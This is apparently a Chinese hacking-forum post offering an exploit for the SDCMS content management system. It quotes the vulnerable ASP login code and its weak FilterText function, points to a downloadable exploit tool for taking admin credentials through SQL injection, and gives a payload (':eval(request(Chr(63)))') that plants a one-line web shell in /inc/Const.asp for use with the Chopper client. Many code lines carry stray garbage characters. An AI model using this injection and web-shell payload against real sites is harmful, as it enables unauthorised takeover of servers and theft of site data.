SDCMS通杀漏洞利用工具及提权拿SHELL

admin

作者：T00LS 鬼哥
漏洞文件：后台目录/index.asp

8 E- ^# j0 }: p2 a3 j* w3 lSub Check
- R7 Z8 e% j1 |! n# K- \    Dim username,password,code,getcode,Rs
( W+ W' K* Z$ j    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
$ o( v: J: V0 P3 k+ o    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
& Q) _$ @. |- Z: G% h    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
! L8 N" h6 v: q( Y! g3 L. r    IF code="" Then Alert "验证码不能为空！","javascript:history.go(-1)"ied
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字！","javascript:history.go(-1)"ied
( S' P$ K. r- [- I) }# `2 t    IF code<>getcode Then Alert "验证码错误！","javascript:history.go(-1)"ied
0 p  t4 F8 [' ^- [8 Q  ?    IF username="" or password="" Then
8 g6 n% i% C; H" x- H' p2 C        Echo "用户名或密码不能为空"ied
8 Y2 F7 }" }6 Q' H8 e    Else
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
0 p. ?) p7 E# V' V; q2 ?        IF Rs.Eof Then
" `5 c  T5 ]$ c/ l5 j  u7 p5 a& @: h            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
; `& l& u* ~, h. P        Else
            Add_Cookies "sdcms_id",Rs(0)
$ h. q" d5 N- d, z6 q/ ~            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
) g  W" {! i& c* k+ u            Add_Cookies "sdcms_admin",Rs(3)
1 @& X7 |3 J  n5 @4 c8 U            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
- [) a% k7 ^/ l0 \, j$ `            AddLog username,GetIp,"登录成功",1
  w9 F# a; p' D! O$ S" c2 ~9 m* n            '自动删除30天前的Log记录
; K% L6 N5 R) e/ j0 T8 M            IF Sdcms_DataType Then
: R7 H0 ^9 V% L  H                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
7 L, u8 p3 a+ K, ^  J            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
  T9 g9 Y, [1 N            End IF
% p" S, L) E' ^  V1 A; [            Go("sdcms_index.asp")
8 x( w3 _2 n# R, r' Z- j+ h! s        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
4 C: W& k; h- _8 H: P1 {6 v% d, r- O! cEnd Sub

’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码

" V" j5 x3 J* zFunction FilterText(ByVal t0,ByVal t1)
& }* i5 G& q& q( o( s0 Z$ ?    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
5 S! Y9 i3 N& h1 o) m& @* n    Select Case t1
        Case "1"
# O% l" p7 X" r; L            t0=Replace(t0,Chr(32),"")
9 `" {0 h( ]' ]% |1 T# r$ X, f            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
. q0 t+ ?2 B, p* c            t0=Replace(t0,Chr(10),"")
, H! Z; m% @4 O: K1 U        Case "2"
            t0=Replace(t0,Chr(8),"")'回格
            t0=Replace(t0,Chr(9),"")'tab(水平制表符)
            t0=Replace(t0,Chr(10),"")'换行
2 h- k; Z& y' }  V& j7 @! n            t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
& K! C- b) L$ k2 a4 B% ], r* m            t0=Replace(t0,Chr(12),"")'换页
3 H+ }" `7 j# k1 r            t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
) J5 ?- v0 ^  w- I; E2 o            t0=Replace(t0,Chr(22),"")
. Z, P) ]5 x# Y4 B5 P3 |% i            t0=Replace(t0,Chr(32),"")'空格 SPACE
( X: V7 t+ |1 X/ z8 @0 Q            t0=Replace(t0,Chr(33),"")'!
9 ^2 N7 _# v4 k+ q" E0 s            t0=Replace(t0,Chr(34),"")'"
* J3 }2 h. [# [2 o            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
$ @9 f  u% d1 K+ w2 y* P3 V* K            t0=Replace(t0,Chr(37),"")'%
- x6 c! Z. L( n: ?4 G9 j            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
) P0 \' k2 c0 B9 q5 `) R* q/ S$ N5 A            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
* H  T! J7 V1 E/ Q  |+ z1 A            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
# T: l$ d/ {: j! B1 @7 C5 _( @2 L            t0=Replace(t0,Chr(60),"")'<             t0=Replace(t0,Chr(61),"")'=             t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
0 {, ~* x, g6 Z+ v6 l3 s' Q& U            t0=Replace(t0,Chr(91),"")'\
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
. X! e3 t/ Q2 R: T) i& r* N            t0=Replace(t0,Chr(123),"")'{
7 s# Y' P0 J: D: p$ `$ T            t0=Replace(t0,Chr(124),"")'|
3 ^" y# N( V, [: A: q% }* j  q            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
    Case Else
        t0=Replace(t0, "&", "&")
        t0=Replace(t0, "'", "'")
        t0=Replace(t0, """", """)
: ]  F# U. ^" g* h6 Z7 [; v' x% J        t0=Replace(t0, "<", "<")         t0=Replace(t0, ">", ">")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
; T" W) P4 }# }. F8 P        t0=Replace(t0,"expression","e&shy;xpression", 1, -1, 0)
    End If
* f7 K, V- E* M. r4 K2 ~6 ?% L    FilterText=t0
End Function
9 }( w/ j5 S/ v9 x" ]9 l: c  e% j+ M3 w' M
. z6 Y% x/ D; r( K. g7 {1 [9 j看到没。直接参数是1 只过滤
6 g! D! n4 ^  ]8 W. z5 }  S4 `                        t0=Replace(t0,Chr(32)," ")
: ]* o/ i+ Q2 `2 Z1 I' G8 ?                        t0=Replace(t0,Chr(13),"")
* j3 c: M2 z. l" u+ U                        t0=Replace(t0,Chr(10)&Chr(10),"
" n' N! t, K+ }  N7 h7 w" A( n& X")
; P5 H! l9 K1 U3 o- q' n( q. J                        t0=Replace(t0,Chr(10),"
")
2 u$ h. h& r0 |- C漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP

/ f0 b+ j* N7 U3 ]: @- A测试:

% B3 G( j0 D6 y$ S' R- `
4 a. T/ f9 O4 b2 }( f现在输入工具上验证码,然后点OK
- W, Y( ^7 t2 v" L& e
/ |: {, A# O3 E, w9 U) }
3 B4 [* ?+ n! L# f看到我们直接进入后台管理界面了,呵呵!
4 `' `4 ?/ o6 C% h( L2 F* b' k
  X, B$ a/ `5 K5 [

这样直接进入后台了。。。。


8 U8 A  ~7 m( d# l4 x
( z3 ?# o+ p" V% O% R0 R! xSDCMS提权:

  x8 E) Q* A2 |. j& F. g6 l: W方法1：访问：/后台目录/sdcms_set.asp 在 网站名称：后面加个 “:eval(request(Chr(63)))’  即可，直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?


0 C% [, l# A* E: U+ G2 c
OK,现在用菜刀连接下!

: H6 l  j3 g, }. n. A9 ]

# K5 H7 ?# S' T4 }5 _* D. X$ h0 I
( D) ~: f5 B) ~3 |% e) }3 q' d
* _% k- i6 z6 o/ c8 I9 v